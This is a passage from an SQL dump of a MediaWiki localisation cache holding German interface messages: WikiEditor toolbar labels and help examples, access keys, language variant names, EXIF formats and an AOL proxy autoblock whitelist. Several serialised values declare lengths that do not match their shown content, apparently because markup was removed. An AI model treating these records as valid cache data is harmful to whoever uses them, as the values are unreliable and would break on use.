ersetzen\";'),('de','messages:wikieditor-toolbar-tool-replace-close','s:10:\"Schließen\";'),('de','messages:wikieditor-toolbar-tool-replace-nomatch','s:42:\"Deine Suche hat keine Ergebnisse erbracht.\";'),('de','messages:wikieditor-toolbar-tool-replace-success','s:58:\"{{PLURAL:$1|Eine Ersetzung|$1 Ersetzungen}} durchgeführt.\";'),('de','messages:wikieditor-toolbar-tool-replace-emptysearch','s:37:\"Du hast nichts zum Suchen eingegeben.\";'),('de','messages:wikieditor-toolbar-tool-replace-invalidregex','s:52:\"Der eingegebene reguläre Ausdruck ist ungültig: $1\";'),('de','messages:wikieditor-toolbar-section-characters','s:13:\"Sonderzeichen\";'),('de','messages:wikieditor-toolbar-characters-page-latin','s:10:\"Lateinisch\";'),('de','messages:wikieditor-toolbar-characters-page-latinextended','s:21:\"Lateinisch, erweitert\";'),('de','messages:wikieditor-toolbar-characters-page-ipa','s:43:\"Internationales Phonetisches Alphabet (IPA)\";'),('de','messages:wikieditor-toolbar-characters-page-symbols','s:7:\"Symbole\";'),('de','messages:wikieditor-toolbar-characters-page-greek','s:10:\"Griechisch\";'),('de','messages:wikieditor-toolbar-characters-page-cyrillic','s:10:\"Kyrillisch\";'),('de','messages:wikieditor-toolbar-characters-page-arabic','s:8:\"Arabisch\";'),('de','messages:wikieditor-toolbar-characters-page-arabicextended','s:19:\"Arabisch, erweitert\";'),('de','messages:wikieditor-toolbar-characters-page-persian','s:8:\"Persisch\";'),('de','messages:wikieditor-toolbar-characters-page-hebrew','s:10:\"Hebräisch\";'),('de','messages:wikieditor-toolbar-characters-page-bangla','s:10:\"Bengalisch\";'),('de','messages:wikieditor-toolbar-characters-page-tamil','s:9:\"Tamilisch\";'),('de','messages:wikieditor-toolbar-characters-page-telugu','s:6:\"Telugu\";'),('de','messages:wikieditor-toolbar-characters-page-sinhala','s:13:\"Singhalesisch\";'),('de','messages:wikieditor-toolbar-characters-page-gujarati','s:8:\"Gujarati\";'),('de','messages:wikieditor-toolbar-characters-page-devanagari','s:10:\"Devanagari\";'),('de','messages:wikieditor-toolbar-characters-page-thai','s:13:\"Thailändisch\";'),('de','messages:wikieditor-toolbar-characters-page-lao','s:8:\"Laotisch\";'),('de','messages:wikieditor-toolbar-characters-page-khmer','s:5:\"Khmer\";'),('de','messages:wikieditor-toolbar-characters-endash','s:17:\"Halbgeviertstrich\";'),('de','messages:wikieditor-toolbar-characters-emdash','s:13:\"Geviertstrich\";'),('de','messages:wikieditor-toolbar-characters-minus','s:5:\"Minus\";'),('de','messages:wikieditor-toolbar-section-help','s:5:\"Hilfe\";'),('de','messages:wikieditor-toolbar-help-heading-description','s:12:\"Beschreibung\";'),('de','messages:wikieditor-toolbar-help-heading-syntax','s:15:\"Was du eingibst\";'),('de','messages:wikieditor-toolbar-help-heading-result','s:15:\"Wie es aussieht\";'),('de','messages:wikieditor-toolbar-help-page-format','s:12:\"Formatierung\";'),('de','messages:wikieditor-toolbar-help-page-link','s:5:\"Links\";'),('de','messages:wikieditor-toolbar-help-page-heading','s:14:\"Überschriften\";'),('de','messages:wikieditor-toolbar-help-page-list','s:6:\"Listen\";'),('de','messages:wikieditor-toolbar-help-page-file','s:7:\"Dateien\";'),('de','messages:wikieditor-toolbar-help-page-reference','s:14:\"Quellenangaben\";'),('de','messages:wikieditor-toolbar-help-page-discussion','s:10:\"Diskussion\";'),('de','messages:wikieditor-toolbar-help-content-italic-description','s:6:\"Kursiv\";'),('de','messages:wikieditor-toolbar-help-content-italic-syntax','s:17:\"\'\'Kursiver Text\'\'\";'),('de','messages:wikieditor-toolbar-help-content-italic-result','s:22:\"Kursiver Text\";'),('de','messages:wikieditor-toolbar-help-content-bold-description','s:4:\"Fett\";'),('de','messages:wikieditor-toolbar-help-content-bold-syntax','s:17:\"\'\'\'Fetter Text\'\'\'\";'),('de','messages:wikieditor-toolbar-help-content-bold-result','s:28:\"Fetter Text\";'),('de','messages:wikieditor-toolbar-help-content-bolditalic-description','s:15:\"Fett und kursiv\";'),('de','messages:wikieditor-toolbar-help-content-bolditalic-syntax','s:34:\"\'\'\'\'\'Fetter und kursiver Text\'\'\'\'\'\";'),('de','messages:wikieditor-toolbar-help-content-bolditalic-result','s:50:\"Fetter und kursiver Text\";'),('de','messages:wikieditor-toolbar-help-content-ilink-description','s:13:\"Interner Link\";'),('de','messages:wikieditor-toolbar-help-content-ilink-syntax','s:45:\"[[Seitentitel|Linktext]]
                                                                [[Seitentitel]]\";'),('de','messages:wikieditor-toolbar-help-content-ilink-result','s:57:\"Linktext
                                                                Seitentitel\";'),('de','messages:wikieditor-toolbar-help-content-xlink-description','s:13:\"Externer Link\";'),('de','messages:wikieditor-toolbar-help-content-xlink-syntax','s:91:\"[http://www.example.org Linktext]
                                                                [http://www.example.org]
                                                                http://www.example.org\";'),('de','messages:wikieditor-toolbar-help-content-xlink-result','s:155:\"Linktext
                                                                [1]
                                                                http://www.example.org\";'),('de','messages:wikieditor-toolbar-help-content-heading2-description','s:17:\"Kopfzeile Ebene 2\";'),('de','messages:wikieditor-toolbar-help-content-heading2-syntax','s:18:\"== Überschrift ==\";'),('de','messages:wikieditor-toolbar-help-content-heading2-result','s:21:\"

                                                                Überschrift

                                                                \";'),('de','messages:wikieditor-toolbar-help-content-heading3-description','s:17:\"Kopfzeile Ebene 3\";'),('de','messages:wikieditor-toolbar-help-content-heading3-syntax','s:20:\"=== Überschrift ===\";'),('de','messages:wikieditor-toolbar-help-content-heading3-result','s:21:\"

                                                                Überschrift

                                                                \";'),('de','messages:wikieditor-toolbar-help-content-heading4-description','s:17:\"Kopfzeile Ebene 4\";'),('de','messages:wikieditor-toolbar-help-content-heading4-syntax','s:22:\"==== Überschrift ====\";'),('de','messages:wikieditor-toolbar-help-content-heading4-result','s:21:\"

                                                                Überschrift

                                                                \";'),('de','messages:wikieditor-toolbar-help-content-heading5-description','s:17:\"Kopfzeile Ebene 5\";'),('de','messages:wikieditor-toolbar-help-content-heading5-syntax','s:24:\"===== Überschrift =====\";'),('de','messages:wikieditor-toolbar-help-content-heading5-result','s:21:\"
                                                                Überschrift
                                                                \";'),('de','messages:wikieditor-toolbar-help-content-ulist-description','s:18:\"Aufgezählte Liste\";'),('de','messages:wikieditor-toolbar-help-content-ulist-syntax','s:36:\"* Listeneintrag
                                                                * Listeneintrag\";'),('de','messages:wikieditor-toolbar-help-content-ulist-result','s:53:\"
                                                                • Listeneintrag
                                                                • Listeneintrag
                                                                \";'),('de','messages:wikieditor-toolbar-help-content-olist-description','s:17:\"Nummerierte Liste\";'),('de','messages:wikieditor-toolbar-help-content-olist-syntax','s:36:\"# Listeneintrag
                                                                # Listeneintrag\";'),('de','messages:wikieditor-toolbar-help-content-olist-result','s:53:\"
                                                                1. Listeneintrag
                                                                2. Listeneintrag
                                                                \";'),('de','messages:wikieditor-toolbar-help-content-file-description','s:18:\"Eingebettete Datei\";'),('de','messages:wikieditor-toolbar-help-content-file-syntax','s:41:\"[[$1:Beispiel.png|miniatur|Beschreibung]]\";'),('de','messages:wikieditor-toolbar-help-content-file-result','s:431:\"
                                                                \'\'/
                                                                \'\'
                                                                Beschreibung
                                                                \";'),('de','messages:wikieditor-toolbar-help-content-reference-description','s:14:\"Einzelnachweis\";'),('de','messages:wikieditor-toolbar-help-content-reference-syntax','s:100:\"Seitentext.<ref name=\"test\">[http://www.example.org Linktext], zusätzlicher Text.</ref>\";'),('de','messages:wikieditor-toolbar-help-content-reference-result','s:41:\"Seitentext.[1]\";'),('de','messages:wikieditor-toolbar-help-content-rereference-description','s:44:\"Den gleichen Einzelnachweis erneut verwenden\";'),('de','messages:wikieditor-toolbar-help-content-rereference-result','s:41:\"Seitentext.[1]\";'),('de','messages:wikieditor-toolbar-help-content-showreferences-description','s:24:\"Einzelnachweise anzeigen\";'),('de','messages:wikieditor-toolbar-help-content-showreferences-result','s:206:\"
                                                                1. ^ Linktext, zusätzlicher Text.
                                                                \";'),('de','messages:wikieditor-toolbar-help-content-signaturetimestamp-description','s:24:\"Signatur mit Zeitstempel\";'),('de','messages:wikieditor-toolbar-help-content-signaturetimestamp-result','s:140:\"Benutzername (Diskussion) 15:54, 10. Jun. 2009 (UTC)\";'),('de','messages:wikieditor-toolbar-help-content-signature-description','s:8:\"Signatur\";'),('de','messages:wikieditor-toolbar-help-content-signature-result','s:113:\"Benutzername (Diskussion)\";'),('de','messages:wikieditor-toolbar-help-content-indent-description','s:10:\"Einrücken\";'),('de','messages:wikieditor-toolbar-help-content-indent-syntax','s:64:\"Normaler Text
                                                                :Eingerückter Text
                                                                ::Eingerückter Text\";'),('de','messages:wikieditor-toolbar-help-content-indent-result','s:85:\"Normaler Text
                                                                Eingerückter Text
                                                                Eingerückter Text
                                                                \";'),('de','messages:sidebar','s:158:\"\n* navigation\n** mainpage|mainpage-description\n** recentchanges-url|recentchanges\n** randompage-url|randompage\n** helppage|help\n* SEARCH\n* TOOLBOX\n* LANGUAGES\";'),('de','messages:pagecategorieslink','s:18:\"Special:Categories\";'),('de','messages:categoryviewer-pagedlinks','s:9:\"($1) ($2)\";'),('de','messages:sitetitle','s:12:\"{{SITENAME}}\";'),('de','messages:sitesubtitle','s:0:\"\";'),('de','messages:addsection','s:1:\"+\";'),('de','messages:talkpageheader','s:1:\"-\";'),('de','messages:edithelppage','s:68:\"https://www.mediawiki.org/wiki/Special:MyLanguage/Help:Editing_pages\";'),('de','messages:helppage','s:63:\"https://www.mediawiki.org/wiki/Special:MyLanguage/Help:Contents\";'),('de','messages:pagetitle-view-mainpage','s:12:\"{{SITENAME}}\";'),('de','messages:backlinksubtitle','s:6:\"← $1\";'),('de','messages:newtalkseparator','s:6:\", \";'),('de','messages:feed-atom','s:4:\"Atom\";'),('de','messages:feed-rss','s:3:\"RSS\";'),('de','messages:sitenotice','s:1:\"-\";'),('de','messages:anonnotice','s:1:\"-\";'),('de','messages:newsectionheaderdefaultlevel','s:8:\"== $1 ==\";'),('de','messages:mainpage-nstab','s:0:\"\";'),('de','messages:createacct-helpusername','s:0:\"\";'),('de','messages:loginprompt','s:0:\"\";'),('de','messages:userlogout-summary','s:0:\"\";'),('de','messages:helplogin-url','s:65:\"https://www.mediawiki.org/wiki/Special:MyLanguage/Help:Logging_in\";'),('de','messages:userlogin-loggedin','s:92:\"You are already logged in as {{GENDER:$1|$1}}.\nUse the form below to log in as another user.\";'),('de','messages:userlogin-createanother','s:22:\"Create another account\";'),('de','messages:createacct-imgcaptcha-help','s:0:\"\";'),('de','messages:createacct-benefit-icon1','s:10:\"icon-edits\";'),('de','messages:createacct-benefit-head1','s:17:\"{{NUMBEROFEDITS}}\";'),('de','messages:createacct-benefit-icon2','s:10:\"icon-pages\";'),('de','messages:createacct-benefit-head2','s:20:\"{{NUMBEROFARTICLES}}\";'),('de','messages:createacct-benefit-icon3','s:17:\"icon-contributors\";'),('de','messages:createacct-benefit-head3','s:23:\"{{NUMBEROFACTIVEUSERS}}\";'),('de','messages:nocookiesforlogin','s:22:\"{{int:nocookieslogin}}\";'),('de','messages:passwordtoolong','s:72:\"Passwords cannot be longer than {{PLURAL:$1|1 character|$1 characters}}.\";'),('de','messages:loginstart','s:0:\"\";'),('de','messages:loginend','s:0:\"\";'),('de','messages:loginend-https','s:0:\"\";'),('de','messages:signupstart','s:18:\"{{int:loginstart}}\";'),('de','messages:signupend','s:16:\"{{int:loginend}}\";'),('de','messages:signupend-https','s:0:\"\";'),('de','messages:emailsender','s:12:\"{{SITENAME}}\";'),('de','messages:loginlanguagelinks','s:153:\"* {{#language:de}}|de\n* {{#language:en}}|en\n* {{#language:eo}}|eo\n* {{#language:fr}}|fr\n* {{#language:es}}|es\n* {{#language:it}}|it\n* {{#language:nl}}|nl\";'),('de','messages:pear-mail-error','s:2:\"$1\";'),('de','messages:php-mail-error','s:2:\"$1\";'),('de','messages:changepassword-summary','s:0:\"\";'),('de','messages:changeemail-summary','s:0:\"\";'),('de','messages:resettokens-summary','s:0:\"\";'),('de','messages:newarticletextanon','s:25:\"{{int:newarticletext|$1}}\";'),('de','messages:talkpagetext','s:31:\"\";'),('de','messages:noarticletextanon','s:21:\"{{int:noarticletext}}\";'),('de','messages:editpage-head-copy-warn','s:1:\"-\";'),('de','messages:editpage-tos-summary','s:1:\"-\";'),('de','messages:longpage-hint','s:1:\"-\";'),('de','messages:edittools-upload','s:1:\"-\";'),('de','messages:addsection-preload','s:0:\"\";'),('de','messages:addsection-editintro','s:0:\"\";'),('de','messages:createaccount-hook-aborted','s:2:\"$1\";'),('de','messages:revision-info-current','s:1:\"-\";'),('de','messages:revision-nav','s:65:\"($1) $2{{int:pipe-separator}}$3 ($4){{int:pipe-separator}}$5 ($6)\";'),('de','messages:history_copyright','s:1:\"-\";'),('de','messages:mergehistory-revisionrow','s:23:\"$1 ($2) $3 . . $4 $5 $6\";'),('de','messages:search-summary','s:0:\"\";'),('de','messages:searchmenu-new-nocreate','s:0:\"\";'),('de','messages:search-interwiki-custom','s:0:\"\";'),('de','messages:googlesearch','s:630:\"
                                                                \n \n \n \n \n\n \n \n
                                                                \n \n \n
                                                                \n
                                                                \";'),('de','messages:opensearch-desc','s:34:\"{{SITENAME}} ({{CONTENTLANGUAGE}})\";'),('de','messages:preferences-summary','s:0:\"\";'),('de','messages:userrights-summary','s:0:\"\";'),('de','messages:userrights-irreversible-marker','s:3:\"$1*\";'),('de','messages:right-editcontentmodel','s:32:\"Edit the content model of a page\";'),('de','messages:action-editcontentmodel','s:32:\"edit the content model of a page\";'),('de','messages:recentchanges-url','s:21:\"Special:RecentChanges\";'),('de','messages:recentchangestext','s:1:\"-\";'),('de','messages:recentchanges-legend-minor','s:33:\"{{int:recentchanges-label-minor}}\";'),('de','messages:recentchanges-legend-bot','s:31:\"{{int:recentchanges-label-bot}}\";'),('de','messages:recentchanges-legend-unpatrolled','s:39:\"{{int:recentchanges-label-unpatrolled}}\";'),('de','messages:unpatrolledletter','s:1:\"!\";'),('de','messages:number_of_watching_users_RCview','s:4:\"[$1]\";'),('de','messages:upload-summary','s:0:\"\";'),('de','messages:uploadfooter','s:1:\"-\";'),('de','messages:upload-default-description','s:1:\"-\";'),('de','messages:uploadedimage','s:17:\"uploaded \"[[$1]]\"\";'),('de','messages:overwroteimage','s:34:\"uploaded a new version of \"[[$1]]\"\";'),('de','messages:licenses','s:1:\"-\";'),('de','messages:shareddescriptionfollows','s:1:\"-\";'),('de','messages:shared-repo-name-wikimediacommons','s:17:\"Wikimedia Commons\";'),('de','messages:unwatchedpages-summary','s:0:\"\";'),('de','messages:listredirects-summary','s:0:\"\";'),('de','messages:unusedtemplates-summary','s:0:\"\";'),('de','messages:randompage-url','s:14:\"Special:Random\";'),('de','messages:statistics-summary','s:0:\"\";'),('de','messages:statistics-footer','s:0:\"\";'),('de','messages:pageswithprop-summary','s:0:\"\";'),('de','messages:doubleredirects-summary','s:0:\"\";'),('de','messages:brokenredirects-summary','s:0:\"\";'),('de','messages:fewestrevisions-summary','s:0:\"\";'),('de','messages:lonelypages-summary','s:0:\"\";'),('de','messages:uncategorizedpages-summary','s:0:\"\";'),('de','messages:uncategorizedcategories-summary','s:0:\"\";'),('de','messages:uncategorizedimages-summary','s:0:\"\";'),('de','messages:uncategorizedtemplates-summary','s:0:\"\";'),('de','messages:unusedcategories-summary','s:0:\"\";'),('de','messages:unusedimages-summary','s:0:\"\";'),('de','messages:popularpages-summary','s:0:\"\";'),('de','messages:wantedcategories-summary','s:0:\"\";'),('de','messages:wantedpages-summary','s:0:\"\";'),('de','messages:wantedfiles-summary','s:0:\"\";'),('de','messages:wantedtemplates-summary','s:0:\"\";'),('de','messages:mostlinked-summary','s:0:\"\";'),('de','messages:mostlinkedcategories-summary','s:0:\"\";'),('de','messages:mostlinkedtemplates-summary','s:0:\"\";'),('de','messages:mostcategories-summary','s:0:\"\";'),('de','messages:mostimages-summary','s:0:\"\";'),('de','messages:mostinterwikis-summary','s:0:\"\";'),('de','messages:mostrevisions-summary','s:0:\"\";'),('de','messages:prefixindex-summary','s:0:\"\";'),('de','messages:shortpages-summary','s:0:\"\";'),('de','messages:longpages-summary','s:0:\"\";'),('de','messages:deadendpages-summary','s:0:\"\";'),('de','messages:protectedpages-unknown-reason','s:3:\"—\";'),('de','messages:listusers-summary','s:0:\"\";'),('de','messages:newpages-summary','s:0:\"\";'),('de','messages:ancientpages-summary','s:0:\"\";'),('de','messages:booksources-summary','s:0:\"\";'),('de','messages:booksources-isbn','s:5:\"ISBN:\";'),('de','messages:rfcurl','s:27:\"//tools.ietf.org/html/rfc$1\";'),('de','messages:pubmedurl','s:46:\"//www.ncbi.nlm.nih.gov/pubmed/$1?dopt=Abstract\";'),('de','messages:allpages-summary','s:0:\"\";'),('de','messages:categories-summary','s:0:\"\";'),('de','messages:deletedcontributions-summary','s:0:\"\";'),('de','messages:linksearch-summary','s:0:\"\";'),('de','messages:activeusers-summary','s:0:\"\";'),('de','messages:listgrouprights-right-display','s:65:\"$1 ($2)\";'),('de','messages:listgrouprights-right-revoked','s:65:\"$1 ($2)\";'),('de','messages:emailuser-summary','s:0:\"\";'),('de','messages:watchlist-summary','s:0:\"\";'),('de','messages:protect-summary-desc','s:12:\"[$1=$2] ($3)\";'),('de','messages:undelete-summary','s:0:\"\";'),('de','messages:undelete-revision-row','s:32:\"$1 $2 ($3) $4 . . $5 $6 $7 $8 $9\";'),('de','messages:contributions-summary','s:0:\"\";'),('de','messages:sp-contributions-explain','s:0:\"\";'),('de','messages:sp-contributions-footer','s:1:\"-\";'),('de','messages:sp-contributions-footer-anon','s:1:\"-\";'),('de','messages:sp-contributions-footer-newbies','s:1:\"-\";'),('de','messages:whatlinkshere-summary','s:0:\"\";'),('de','messages:unblock-summary','s:0:\"\";'),('de','messages:blocklist-summary','s:0:\"\";'),('de','messages:sorbs','s:5:\"DNSBL\";'),('de','messages:ipb-default-expiry','s:0:\"\";'),('de','messages:movepage-summary','s:0:\"\";'),('de','messages:move-redirect-text','s:0:\"\";'),('de','messages:category-move-redirect-override','s:1:\"-\";'),('de','messages:export-summary','s:0:\"\";'),('de','messages:import-summary','s:0:\"\";'),('de','messages:javascripttest-backlink','s:4:\"< $1\";'),('de','messages:javascripttest-pagetext-unknownaction','s:20:\"Unknown action \"$1\".\";'),('de','messages:javascripttest-qunit-name','s:5:\"QUnit\";'),('de','messages:accesskey-pt-userpage','s:1:\".\";'),('de','messages:accesskey-pt-anonuserpage','s:1:\".\";'),('de','messages:accesskey-pt-mytalk','s:1:\"n\";'),('de','messages:accesskey-pt-anontalk','s:1:\"n\";'),('de','messages:accesskey-pt-preferences','s:0:\"\";'),('de','messages:accesskey-pt-watchlist','s:1:\"l\";'),('de','messages:accesskey-pt-mycontris','s:1:\"y\";'),('de','messages:accesskey-pt-login','s:1:\"o\";'),('de','messages:accesskey-pt-logout','s:0:\"\";'),('de','messages:accesskey-ca-talk','s:1:\"t\";'),('de','messages:accesskey-ca-edit','s:1:\"e\";'),('de','messages:accesskey-ca-addsection','s:1:\"+\";'),('de','messages:accesskey-ca-viewsource','s:1:\"e\";'),('de','messages:accesskey-ca-history','s:1:\"h\";'),('de','messages:accesskey-ca-protect','s:1:\"=\";'),('de','messages:accesskey-ca-unprotect','s:1:\"=\";'),('de','messages:accesskey-ca-delete','s:1:\"d\";'),('de','messages:accesskey-ca-undelete','s:1:\"d\";'),('de','messages:accesskey-ca-move','s:1:\"m\";'),('de','messages:accesskey-ca-watch','s:1:\"w\";'),('de','messages:accesskey-ca-unwatch','s:1:\"w\";'),('de','messages:accesskey-search','s:1:\"f\";'),('de','messages:accesskey-search-go','s:0:\"\";'),('de','messages:accesskey-search-fulltext','s:0:\"\";'),('de','messages:accesskey-p-logo','s:0:\"\";'),('de','messages:accesskey-n-mainpage','s:1:\"z\";'),('de','messages:accesskey-n-mainpage-description','s:1:\"z\";'),('de','messages:accesskey-n-portal','s:0:\"\";'),('de','messages:accesskey-n-currentevents','s:0:\"\";'),('de','messages:accesskey-n-recentchanges','s:1:\"r\";'),('de','messages:accesskey-n-randompage','s:1:\"x\";'),('de','messages:accesskey-n-help','s:0:\"\";'),('de','messages:accesskey-t-whatlinkshere','s:1:\"j\";'),('de','messages:accesskey-t-recentchangeslinked','s:1:\"k\";'),('de','messages:accesskey-feed-rss','s:0:\"\";'),('de','messages:accesskey-feed-atom','s:0:\"\";'),('de','messages:accesskey-t-contributions','s:0:\"\";'),('de','messages:accesskey-t-emailuser','s:0:\"\";'),('de','messages:accesskey-t-permalink','s:0:\"\";'),('de','messages:accesskey-t-print','s:1:\"p\";'),('de','messages:accesskey-t-upload','s:1:\"u\";'),('de','messages:accesskey-t-specialpages','s:1:\"q\";'),('de','messages:accesskey-ca-nstab-main','s:1:\"c\";'),('de','messages:accesskey-ca-nstab-user','s:1:\"c\";'),('de','messages:accesskey-ca-nstab-media','s:1:\"c\";'),('de','messages:accesskey-ca-nstab-special','s:0:\"\";'),('de','messages:accesskey-ca-nstab-project','s:1:\"a\";'),('de','messages:accesskey-ca-nstab-image','s:1:\"c\";'),('de','messages:accesskey-ca-nstab-mediawiki','s:1:\"c\";'),('de','messages:accesskey-ca-nstab-template','s:1:\"c\";'),('de','messages:accesskey-ca-nstab-help','s:1:\"c\";'),('de','messages:accesskey-ca-nstab-category','s:1:\"c\";'),('de','messages:accesskey-minoredit','s:1:\"i\";'),('de','messages:accesskey-save','s:1:\"s\";'),('de','messages:accesskey-preview','s:1:\"p\";'),('de','messages:accesskey-diff','s:1:\"v\";'),('de','messages:accesskey-compareselectedversions','s:1:\"v\";'),('de','messages:accesskey-watch','s:1:\"w\";'),('de','messages:accesskey-upload','s:1:\"s\";'),('de','messages:accesskey-preferences-save','s:1:\"s\";'),('de','messages:accesskey-summary','s:1:\"b\";'),('de','messages:accesskey-userrights-set','s:1:\"s\";'),('de','messages:accesskey-blockip-block','s:1:\"s\";'),('de','messages:accesskey-export','s:1:\"s\";'),('de','messages:accesskey-import','s:1:\"s\";'),('de','messages:accesskey-watchlistedit-normal-submit','s:1:\"s\";'),('de','messages:accesskey-watchlistedit-raw-submit','s:1:\"s\";'),('de','messages:interlanguage-link-title-langonly','s:2:\"$1\";'),('de','messages:interlanguage-link-title-nonlangonly','s:2:\"$1\";'),('de','messages:pageinfo-header','s:1:\"-\";'),('de','messages:pageinfo-footer','s:1:\"-\";'),('de','messages:markaspatrolledlink','s:4:\"[$1]\";'),('de','messages:widthheight','s:8:\"$1 × $2\";'),('de','messages:newimagestext','s:1:\"-\";'),('de','messages:video-dims','s:12:\"$1, $2 × $3\";'),('de','messages:seconds-abbrev','s:4:\"$1 s\";'),('de','messages:minutes-abbrev','s:6:\"$1 min\";'),('de','messages:hours-abbrev','s:4:\"$1 h\";'),('de','messages:days-abbrev','s:4:\"$1 d\";'),('de','messages:today-at','s:2:\"$1\";'),('de','messages:variantname-zh-hans','s:4:\"hans\";'),('de','messages:variantname-zh-hant','s:4:\"hant\";'),('de','messages:variantname-zh-cn','s:2:\"cn\";'),('de','messages:variantname-zh-tw','s:2:\"tw\";'),('de','messages:variantname-zh-hk','s:2:\"hk\";'),('de','messages:variantname-zh-mo','s:2:\"mo\";'),('de','messages:variantname-zh-sg','s:2:\"sg\";'),('de','messages:variantname-zh-my','s:2:\"my\";'),('de','messages:variantname-zh','s:2:\"zh\";'),('de','messages:variantname-gan-hans','s:4:\"hans\";'),('de','messages:variantname-gan-hant','s:4:\"hant\";'),('de','messages:variantname-gan','s:3:\"gan\";'),('de','messages:variantname-sr-ec','s:5:\"sr-ec\";'),('de','messages:variantname-sr-el','s:5:\"sr-el\";'),('de','messages:variantname-sr','s:2:\"sr\";'),('de','messages:variantname-kk-kz','s:5:\"kk-kz\";'),('de','messages:variantname-kk-tr','s:5:\"kk-tr\";'),('de','messages:variantname-kk-cn','s:5:\"kk-cn\";'),('de','messages:variantname-kk-cyrl','s:7:\"kk-cyrl\";'),('de','messages:variantname-kk-latn','s:7:\"kk-latn\";'),('de','messages:variantname-kk-arab','s:7:\"kk-arab\";'),('de','messages:variantname-kk','s:2:\"kk\";'),('de','messages:variantname-ku-arab','s:7:\"ku-Arab\";'),('de','messages:variantname-ku-latn','s:7:\"ku-Latn\";'),('de','messages:variantname-ku','s:2:\"ku\";'),('de','messages:variantname-tg-cyrl','s:7:\"tg-Cyrl\";'),('de','messages:variantname-tg-latn','s:7:\"tg-Latn\";'),('de','messages:variantname-tg','s:2:\"tg\";'),('de','messages:variantname-ike-cans','s:8:\"ike-Cans\";'),('de','messages:variantname-ike-latn','s:8:\"ike-Latn\";'),('de','messages:variantname-iu','s:2:\"iu\";'),('de','messages:variantname-shi-tfng','s:8:\"shi-Tfng\";'),('de','messages:variantname-shi-latn','s:8:\"shi-Latn\";'),('de','messages:variantname-shi','s:3:\"shi\";'),('de','messages:variantname-uz','s:2:\"uz\";'),('de','messages:variantname-uz-latn','s:7:\"uz-Latn\";'),('de','messages:variantname-uz-cyrl','s:7:\"uz-Cyrl\";'),('de','messages:metadata-langitem','s:23:\"$2: $1\";'),('de','messages:metadata-langitem-default','s:2:\"$1\";'),('de','messages:exif-fnumber-format','s:4:\"f/$1\";'),('de','messages:exif-focallength-format','s:5:\"$1 mm\";'),('de','messages:exif-coordinate-format','s:19:\"$1° $2′ $3″ $4\";'),('de','messages:exif-make-value','s:2:\"$1\";'),('de','messages:exif-model-value','s:2:\"$1\";'),('de','messages:exif-software-value','s:2:\"$1\";'),('de','messages:exif-software-version-value','s:15:\"$1 (Version $2)\";'),('de','messages:exif-contact-value','s:52:\"$1\n\n$2\n
                                                                \n$3\n\n$4, $5, $6 $7\n
                                                                \n$8\";'),('de','messages:exif-subjectnewscode-value','s:7:\"$2 ($1)\";'),('de','messages:exif-compression-5','s:3:\"LZW\";'),('de','messages:exif-compression-6','s:10:\"JPEG (old)\";'),('de','messages:exif-compression-7','s:4:\"JPEG\";'),('de','messages:exif-compression-8','s:15:\"Deflate (Adobe)\";'),('de','messages:exif-compression-32773','s:24:\"PackBits (Macintosh RLE)\";'),('de','messages:exif-compression-32946','s:15:\"Deflate (PKZIP)\";'),('de','messages:exif-compression-34712','s:8:\"JPEG2000\";'),('de','messages:exif-photometricinterpretation-2','s:3:\"RGB\";'),('de','messages:exif-photometricinterpretation-6','s:5:\"YCbCr\";'),('de','messages:exif-xyresolution-i','s:6:\"$1 dpi\";'),('de','messages:exif-xyresolution-c','s:6:\"$1 dpc\";'),('de','messages:exif-colorspace-1','s:4:\"sRGB\";'),('de','messages:exif-componentsconfiguration-1','s:1:\"Y\";'),('de','messages:exif-componentsconfiguration-2','s:2:\"Cb\";'),('de','messages:exif-componentsconfiguration-3','s:2:\"Cr\";'),('de','messages:exif-componentsconfiguration-4','s:1:\"R\";'),('de','messages:exif-componentsconfiguration-5','s:1:\"G\";'),('de','messages:exif-componentsconfiguration-6','s:1:\"B\";'),('de','messages:exif-lightsource-20','s:3:\"D55\";'),('de','messages:exif-lightsource-21','s:3:\"D65\";'),('de','messages:exif-lightsource-22','s:3:\"D75\";'),('de','messages:exif-lightsource-23','s:3:\"D50\";'),('de','messages:exif-maxaperturevalue-value','s:14:\"$1 APEX (f/$2)\";'),('de','messages:unit-pixel','s:2:\"px\";'),('de','messages:semicolon-separator','s:6:\"; \";'),('de','messages:comma-separator','s:6:\", \";'),('de','messages:colon-separator','s:6:\": \";'),('de','messages:autocomment-prefix','s:0:\"\";'),('de','messages:pipe-separator','s:11:\" | \";'),('de','messages:word-separator','s:5:\" \";'),('de','messages:parentheses','s:4:\"($1)\";'),('de','messages:brackets','s:4:\"[$1]\";'),('de','messages:img-lang-opt','s:7:\"$2 ($1)\";'),('de','messages:autoblock_whitelist','s:406:\"AOL http://webmaster.info.aol.com/proxyinfo.html\n*64.12.96.0/19\n*149.174.160.0/20\n*152.163.240.0/21\n*152.163.248.0/22\n*152.163.252.0/23\n*152.163.96.0/22\n*152.163.100.0/23\n*195.93.32.0/22\n*195.93.48.0/22\n*195.93.64.0/19\n*195.93.96.0/19\n*195.93.16.0/20\n*198.81.0.0/22\n*198.81.16.0/20\n*198.81.8.0/23\n*202.67.64.128/25\n*205.188.192.0/20\n*205.188.208.0/23\n*205.188.112.0/20\n*205.188.146.144/30\n*207.200.112.0/21\";'),('de','messages:size-kilobytes','s:5:\"$1 KB\";'),('de','messages:size-terabytes','s:5:\"$1 TB\";'),('de','messages:size-petabytes','s:5:\"$1 PB\";'),('de','messages:size-exabytes','s:5:\"$1 EB\";'),('de','messages:size-zetabytes','s:5:\"$1 ZB\";'),('de','messages:size-yottabytes','s:5:\"$1 YB\";'),('de','messages:bitrate-bits','s:6:\"$1 bps\";'),('de','messages:bitrate-kilobits','s:7:\"$1 kbps\";'),('de','messages:bitrate-megabits','s:7:\"$1 Mbps\";'),('de','messages:bitrate-gigabits','s:7:\"$1 Gbps\";'),('de','messages:bitrate-terabits','s:7:\"$1 Tbps\";'),('de','messages:bitrate-petabits','s:7:\"$1 Pbps\";'),('de','messages:bitrate-exabits','s:7:\"$1 Ebps\";'),('de','messages:bitrate-zetabits','s:7:\"$1 Zbps\";'),('de','messages:bitrate-yottabits','s:7:\"$1 